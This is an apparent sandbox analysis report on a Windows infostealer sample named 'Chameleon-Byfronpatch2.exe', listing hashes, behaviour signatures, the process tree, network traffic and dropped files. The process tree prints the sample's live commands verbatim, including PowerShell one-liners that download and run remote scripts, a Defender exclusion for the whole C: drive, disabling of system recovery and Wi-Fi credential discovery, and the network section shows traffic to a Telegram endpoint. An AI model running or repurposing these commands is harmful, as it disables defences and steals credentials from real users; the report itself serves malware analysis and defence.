Analysis

  • max time kernel: 5s
  • max time network: 13s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240802-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13/08/2024, 14:19 UTC

General

  • Target: Chameleon-Byfronpatch2.exe
  • Size: 9.2MB
  • MD5: addbf6301c1ea797554a0152da23d5ae
  • SHA1: 01a22ed2bb77ff84546147098348a07bc0eecbc6
  • SHA256: 585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
  • SHA512: 9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
  • SSDEEP: 98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
    "C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
      2⤵
      • Views/modifies file attributes
      PID:3984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4888
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9395.tmp" "c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\CSCE265A0B6DDB64834B851568920694CAC.TMP"
          4⤵
          PID:2156
    • C:\Windows\system32\reagentc.exe
      reagentc.exe /disable
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      PID:3956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4808
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9396.tmp" "c:\Users\Admin\AppData\Local\Temp\vp3movdc\CSCCEC06B077B884009AFF8CB25DBE50B2.TMP"
          4⤵
          PID:3056
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profiles
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1120
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup administrators
          4⤵
          PID:1052
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2344
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe" /all
        3⤵
        PID:3956
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" user
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user
          4⤵
          PID:3436
      • C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /displaydns
        3⤵
        • Gathers network information
        PID:2016
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup
          4⤵
          PID:3596
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
        3⤵
        PID:1968
      • C:\Windows\system32\NETSTAT.EXE
        "C:\Windows\system32\NETSTAT.EXE" -ano
        3⤵
        • System Network Connections Discovery
        • Gathers network information
        PID:1496
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
        3⤵
        PID:5016
      • C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /all
        3⤵
        • Gathers network information
        PID:632
      • C:\Windows\system32\ROUTE.EXE
        "C:\Windows\system32\ROUTE.EXE" print
        3⤵
        PID:3104
      • C:\Windows\system32\ARP.EXE
        "C:\Windows\system32\ARP.EXE" -a
        3⤵
        • Network Service Discovery
        PID:380
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profile
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:3148
    • C:\Windows\system32\cmd.exe
      cmd /c rundll32.exe user32.dll,SwapMouseButton
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Windows\system32\rundll32.exe
        rundll32.exe user32.dll,SwapMouseButton
        3⤵
        PID:224

Network

  • flag-us DNS api.telegram.org (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: api.telegram.org IN A
    Response: api.telegram.org IN A 149.154.167.220
  • flag-us DNS 220.167.154.149.in-addr.arpa (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: 220.167.154.149.in-addr.arpa IN PTR
    Response:
  • flag-us DNS raw.githubusercontent.com (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: raw.githubusercontent.com IN A
    Response:
    raw.githubusercontent.com IN A 185.199.108.133
    raw.githubusercontent.com IN A 185.199.109.133
    raw.githubusercontent.com IN A 185.199.111.133
    raw.githubusercontent.com IN A 185.199.110.133
  • flag-us GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1 (powershell.exe)
    Remote address: 185.199.108.133:443
    Request:
    GET /EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response:
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 617
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "f444ba7ea4531399f26b6eac1490d5c9ed57624eda8be597eb1b22193c39d280"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 95D6:3D1DA0:382913:46B64E:66BB6BAD
    Accept-Ranges: bytes
    Date: Tue, 13 Aug 2024 14:20:29 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600042-LCY
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1723558830.626993,VS0,VE249
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: de723d08182fdcf76e5e708c77617e09ebf783dc
    Expires: Tue, 13 Aug 2024 14:25:29 GMT
    Source-Age: 0
  • flag-us GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1 (powershell.exe)
    Remote address: 185.199.108.133:443
    Request:
    GET /EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response:
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 5753
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "36cc62445a08a962a9d3aa0a0bfd23233e35ac3e4082aa53adb300575fb6e171"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: FDD1:1CE552:1A5CAF:2035D4:66BB6BAB
    Accept-Ranges: bytes
    Date: Tue, 13 Aug 2024 14:20:29 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon420116-LON
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1723558830.629716,VS0,VE128
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 852db7b73d76fb6d8b13c24a45c96c05d0d84505
    Expires: Tue, 13 Aug 2024 14:25:29 GMT
    Source-Age: 0
  • flag-us DNS 133.108.199.185.in-addr.arpa (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: 133.108.199.185.in-addr.arpa IN PTR
    Response: 133.108.199.185.in-addr.arpa IN PTR cdn-185-199-108-133githubcom
  • flag-us DNS g.bing.com (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: g.bing.com IN A
    Response:
    g.bing.com IN CNAME g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net IN CNAME dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net IN A 13.107.21.237
    dual-a-0034.a-msedge.net IN A 204.79.197.237
  • flag-us GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    Remote address: 13.107.21.237:443
    Request:
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response:
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=16989FAAE546674022188B70E4A6660D; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:31 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 592E06E2D70541EB91FB451AD1682A27 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:31Z
    date: Tue, 13 Aug 2024 14:20:30 GMT
  • flag-us GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    Remote address: 13.107.21.237:443
    Request:
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=16989FAAE546674022188B70E4A6660D
    Response:
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY; domain=.bing.com; expires=Sun, 07-Sep-2025 14:20:32 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 43524FD91D884AD4B9E20979AA3602EA Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
    date: Tue, 13 Aug 2024 14:20:31 GMT
  • flag-us GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    Remote address: 13.107.21.237:443
    Request:
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=16989FAAE546674022188B70E4A6660D; MSPTC=Wb4ONtm53ejkU487KI-Q6IVpGfYOD5pXdCY4de8M5qY
    Response:
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 295D2F9956D344BA8A7A3D7A43A94EE3 Ref B: LON04EDGE1122 Ref C: 2024-08-13T14:20:32Z
    date: Tue, 13 Aug 2024 14:20:31 GMT
  • flag-us DNS 83.210.23.2.in-addr.arpa (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: 83.210.23.2.in-addr.arpa IN PTR
    Response: 83.210.23.2.in-addr.arpa IN PTR a2-23-210-83deploystaticakamaitechnologiescom
  • flag-us DNS 72.32.126.40.in-addr.arpa (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: 72.32.126.40.in-addr.arpa IN PTR
    Response:
  • flag-us DNS 237.21.107.13.in-addr.arpa (ipconfig.exe)
    Remote address: 8.8.8.8:53
    Request: 237.21.107.13.in-addr.arpa IN PTR
    Response:
  • flag-us DNS 55.36.223.20.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 55.36.223.20.in-addr.arpa IN PTR
    Response:
  • 149.154.167.220:443
    api.telegram.org
    tls
    Chameleon-Byfronpatch2.exe
    920 B
    6.8kB
    12
    12
  • 149.154.167.220:443
    api.telegram.org
    tls
    Chameleon-Byfronpatch2.exe
    86.0kB
    12.9kB
    81
    57
  • 185.199.108.133:443
    https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1
    tls, http
    powershell.exe
    997 B
    7.1kB
    10
    11
    HTTP Request: GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1
    HTTP Response: 200
  • 185.199.108.133:443
    https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1
    tls, http
    powershell.exe
    985 B
    11.1kB
    10
    14
    HTTP Request: GET https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1
    HTTP Response: 200
  • 13.107.21.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    tls, http2
    3.0kB
    10.7kB
    25
    19
    HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    HTTP Response: 204
    HTTP Request: GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    HTTP Response: 204
    HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=983520ae42314175812d6c5549b0a570&localId=w:2D7FBA3B-257B-DA9C-9BEE-3873FD814D61&deviceId=6896205358185221&anid=
    HTTP Response: 204
  • 8.8.8.8:53
    api.telegram.org
    dns
    ipconfig.exe
    62 B
    78 B
    1
    1
    DNS Request: api.telegram.org
    DNS Response: 149.154.167.220
  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    ipconfig.exe
    74 B
    167 B
    1
    1
    DNS Request: 220.167.154.149.in-addr.arpa
  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    ipconfig.exe
    71 B
    135 B
    1
    1
    DNS Request: raw.githubusercontent.com
    DNS Response: 185.199.108.133 185.199.109.133 185.199.111.133 185.199.110.133
  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    ipconfig.exe
    74 B
    118 B
    1
    1
    DNS Request: 133.108.199.185.in-addr.arpa
  • 8.8.8.8:53
    g.bing.com
    dns
    ipconfig.exe
    56 B
    151 B
    1
    1
    DNS Request: g.bing.com
    DNS Response: 13.107.21.237 204.79.197.237
  • 8.8.8.8:53
    83.210.23.2.in-addr.arpa
    dns
    ipconfig.exe
    70 B
    133 B
    1
    1
    DNS Request: 83.210.23.2.in-addr.arpa
  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    ipconfig.exe
    71 B
    157 B
    1
    1
    DNS Request: 72.32.126.40.in-addr.arpa
  • 8.8.8.8:53
    237.21.107.13.in-addr.arpa
    dns
    ipconfig.exe
    72 B
    158 B
    1
    1
    DNS Request: 237.21.107.13.in-addr.arpa
  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1
    DNS Request: 55.36.223.20.in-addr.arpa
MITRE ATT&CK Enterprise v15

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                      • C:\Users\Admin\AppData\Local\Temp\RES9395.tmp

                        Filesize

                        1KB

                      • C:\Users\Admin\AppData\Local\Temp\RES9396.tmp

                        Filesize

                        1KB

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                        Filesize

                        77KB

                      • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                        Filesize

                        61KB

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ql5cpcvh.jhi.ps1

                        Filesize

                        60B

                      • C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.dll

                        Filesize

                        4KB

                      • C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.dll

                        Filesize

                        4KB

                      • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                        Filesize

                        2KB

                      • C:\Windows\system32\drivers\etc\hosts

                        Filesize

                        2KB

                      • \??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\CSCE265A0B6DDB64834B851568920694CAC.TMP

                        Filesize

                        652B

                      • \??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.0.cs

                        Filesize

                        1KB

                      • \??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.cmdline

                        Filesize

                        369B

                      • \??\c:\Users\Admin\AppData\Local\Temp\vp3movdc\CSCCEC06B077B884009AFF8CB25DBE50B2.TMP

                        Filesize

                        652B

                      • \??\c:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.cmdline

                        Filesize

                        369B

                      • memory/4808-82-0x0000016F70AF0000-0x0000016F70B1A000-memory.dmp

                        Filesize

                        168KB

                      • memory/4808-66-0x0000016F70510000-0x0000016F70518000-memory.dmp

                        Filesize

                        32KB

                      • memory/4808-71-0x0000016F70E30000-0x0000016F715D6000-memory.dmp

                        Filesize

                        7.6MB

                      • memory/4808-131-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4808-83-0x0000016F70AF0000-0x0000016F70B14000-memory.dmp

                        Filesize

                        144KB

                      • memory/4808-122-0x0000016F70AE0000-0x0000016F70AEA000-memory.dmp

                        Filesize

                        40KB

                      • memory/4808-10-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4808-121-0x0000016F70AF0000-0x0000016F70B02000-memory.dmp

                        Filesize

                        72KB

                      • memory/4808-6-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4808-30-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4888-69-0x000001E0039A0000-0x000001E0039A8000-memory.dmp

                        Filesize

                        32KB

                      • memory/4888-94-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4888-16-0x000001E0039B0000-0x000001E0039D2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4888-4-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4888-40-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4888-2-0x00007FF81C163000-0x00007FF81C165000-memory.dmp

                        Filesize

                        8KB
